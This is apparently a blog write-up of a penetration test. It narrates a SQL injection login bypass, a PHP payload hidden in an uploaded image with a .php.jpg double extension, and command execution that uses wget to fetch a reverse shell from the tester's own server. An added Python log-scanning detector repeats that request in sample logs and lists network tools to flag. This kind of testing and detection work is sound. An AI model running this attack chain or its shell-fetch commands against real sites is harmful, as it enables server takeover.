I recently came across a penetration test that taught me how to perform SQL injection and command execution. The site's login page wasn't filtering requests properly, which gave me room to perform SQLi; once the SQLi was executed on the login page, it triggered a redirect to the upload page, where I was able to upload an image with malicious code. That gave me command execution, which later allowed me to upload a reverse shell to the server.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.
Attack Setup and Components
SQL injection commands – used to test whether the site is vulnerable to SQL injection
sqlmap – automates the process of detecting and exploiting SQL injection flaws and taking over database servers
PayloadsAllTheThings – contains different kinds of payloads
Image – used to carry the payload
ExifTool – used to read and write the metadata of image files
Payload – inserted into the image, which is then uploaded to the server to get command injection
Python3 – used to set up a web server on the local host
php-reverse-shell – gives me access to the server
Attack Workflow
I started by accessing the website's login page, where I first tested whether the website was vulnerable. I intercepted the request using Burp Suite and sent it to Repeater, where I edited the login field with SQL injection commands and sent it to the server; that confirmed the website was indeed vulnerable to SQL injection.
I then picked up sqlmap to attack the vulnerable website and see whether the tool would be able to dump any databases, usernames, passwords, etc.
After going through sqlmap's results I found there was a filter sqlmap was using that bypasses the login page and redirects the attacker to the upload page.
I went to PayloadsAllTheThings and used the first filter to see whether it would bypass the website's filter mechanism and whether I could get access to the upload page, as sqlmap suggested.
I executed the payload on the login page and indeed got access to the upload page of the website, and this is where the fun part begins.
I downloaded an image from Google and used ExifTool to insert the payload into the image file.
The payload was successfully injected into the image file. The next step was to upload the image to the website.
I uploaded the image, but before sending it directly to the server I intercepted the request in Burp Suite and changed the extension of the image, adding .php between the file name and the extension, and then sent it to the website.
The image was successfully uploaded to the server, as shown in the image below.
After that I executed the payload from the URL ip/images/uploads/babydaddy.php.jpg?cmd=ls and got code execution on the server. Next I had to see whether the server had the wget command, which helps us download resources, and fortunately for me it was there.
Next I started a server on my localhost by typing the command python3 -m http.server, then went back to the URL and uploaded the shell by typing IP/images/uploads/babydaddy.php.jpg?cmd=wget myip:port/php-reverse-shell.php. Once the upload was successful I had to connect to the server by executing the reverse shell with the following URL: ip/images/uploads/php-reverse-shell.php.
I opened up netcat and set up a listener; once the listener was up and running I executed the shell from the server and it connected back to my listener on my local host, as shown below.
And finally I managed to get a shell on the target web server.
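The request chain above leaves a distinctive trail in the web server's access log. The following Python script is an added example, not code from the original post, that scans constructed combined-format log lines for the three signals this write-up describes: an executable extension anywhere in an upload-directory filename (the .php.jpg double extension), a query string on what should be a static image, and a download tool such as wget invoked through a parameter. The upload directory and the tool list are assumptions taken from the URLs in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines modelled on the request chain in this write-up
# (combined log format; IPs, timestamps and the holiday.jpg line are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:02:40 +0000] "GET /images/uploads/babydaddy.php.jpg?cmd=ls HTTP/1.1" 200 331
203.0.113.5 - - [10/Mar/2024:10:03:01 +0000] "GET /images/uploads/babydaddy.php.jpg?cmd=wget%20198.51.100.7:8000/php-reverse-shell.php HTTP/1.1" 200 12
203.0.113.5 - - [10/Mar/2024:10:03:20 +0000] "GET /images/uploads/php-reverse-shell.php HTTP/1.1" 200 0
198.51.100.9 - - [10/Mar/2024:10:04:00 +0000] "GET /images/uploads/holiday.jpg HTTP/1.1" 200 48213
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
UPLOAD_DIR = "/images/uploads/"  # assumed upload location, taken from the URLs in the post
EXEC_EXTS = {".php", ".phtml", ".php3", ".php5", ".phar"}
FETCH_TOOLS = {"wget", "curl", "nc", "bash", "sh", "python", "python3", "perl"}

def analyse_request(target):
    """Return the detection labels that apply to one request target (path plus query)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []
    if path.startswith(UPLOAD_DIR):
        # Every dot-separated suffix counts, so "x.php.jpg" is caught, not only "x.php".
        exts = {"." + s for s in path.rsplit("/", 1)[-1].split(".")[1:]}
        if exts & EXEC_EXTS:
            findings.append("executable extension in upload path" + (" (double extension)" if len(exts) > 1 else ""))
        if parts.query:
            # Static images take no parameters; a query string here means something is interpreting the file.
            findings.append("query string on upload directory file")
    for key, values in parse_qs(parts.query).items():
        for value in values:
            tokens = value.split()  # first-token heuristic: catches "wget http://..." but not tools chained after ";"
            if tokens and tokens[0] in FETCH_TOOLS:
                findings.append(f"'{tokens[0]}' invoked via parameter '{key}'")
    return findings

def scan_log(text):
    """Parse combined-format log lines; return (ip, target, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := analyse_request(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(findings))
```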
Black hat hackers look for such vulnerabilities and exploit them. Such exploits might cause reputational or financial damage to your organization if found by a black hat hacker, so always try your level best to have regular penetration tests performed on your organization to look for such vulnerabilities and patch them.